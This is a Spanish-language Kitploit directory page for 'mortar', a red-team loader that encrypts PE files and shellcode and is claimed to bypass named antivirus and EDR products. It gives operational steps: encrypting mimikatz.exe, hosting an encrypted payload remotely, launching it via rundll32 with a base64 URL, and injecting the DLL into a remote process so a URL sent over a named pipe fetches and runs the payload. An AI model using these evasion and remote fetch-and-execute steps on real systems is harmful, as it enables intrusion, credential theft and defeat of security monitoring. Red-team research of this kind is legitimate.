Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mortar — técnica de evasión para derrotar y desviar la detección y prevención de productos de seguridad (AV/EDR/XDR) | Kitploit
Herramientas/GitHubGitHub/0xsp-srd/mortar
Frameworks de ExploitsGeneración de PayloadsEvasión de IDS/IPSShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

técnica de evasión para derrotar y desviar la detección y prevención de productos de seguridad (AV/EDR/XDR)

Ver Repositorio
1.5k2388hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Mortar Loader

Técnica de evasión de red teaming para derrotar y desviar la detección y prevención de productos de seguridad. Mortar Loader realiza el cifrado y descifrado de PE/Shellcode dentro de los flujos de memoria y lo ejecuta aprovechando varias técnicas de inyección. Mortar es capaz de eludir productos antivirus modernos y soluciones XDR avanzadas, y ha sido probado y confirmado para eludir los siguientes:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

Características actualizadas

La versión más reciente (v3) se ha lanzado con las siguientes funciones:

  • Ejecución sin archivos con binario cifrado o shellcode remoto escenificado.
  • Inyección APC Early Bird.
  • Suplantación de procesos.
  • Soporte para Named Pipes.
  • Ofuscación de cadenas y llamadas a funciones.
  • Subrutina de recarga encubierta de Mortar.
  • Técnicas de ejecución retardada.

Para una descripción más técnica, consulte la siguiente publicación de blog: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

Uso

Encryptor

El cifrador cifra shellcode en C y binarios PE y escribe la salida en un archivo .enc. Puede usar cualquier payload (MSF/cobalt/Havoc, etc.) según prefiera, siempre que sea arquitectura x64 y no RAW.

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Librería Mortar Loader

La nueva versión aprovecha varias técnicas combinadas con la obtención remota de payloads; se recomienda consultar la siguiente publicación para obtener más información.

para instrucciones rápidas

root@kitploit:~
# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

currently supports early bird injection in combination with Named Pipes to receive variables for final execution.

root@kitploit:~
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL 
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. payload will be executed once valid value has been recieved. 

Compilación

El proyecto ha sido codificado usando FPC (Free Pascal); los procedimientos de compilación son sencillos: descargue e instale Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).

Para el cifrador, puede descargarlo desde la sección de lanzamientos o compilarlo fácilmente con Lazarus IDE.

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

Publicaciones

  • El lanzamiento v1: https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Características de Mortar Loader v2: https://0xsp.com/offensive/mortar-loader-v2/
  • Charla en CrestCon Asia 2021: https://www.youtube.com/watch?v=H7EMBz7GLMk

¿Patrocinador?

El desarrollo de Mortar o cualquier proyecto compartido es el resultado de mi tiempo personal.

  • muestras aprecio continuo por mi trabajo.
  • obtendrás acceso anticipado a versiones previas.
  • haz preguntas / serán respondidas.
Descargar herramienta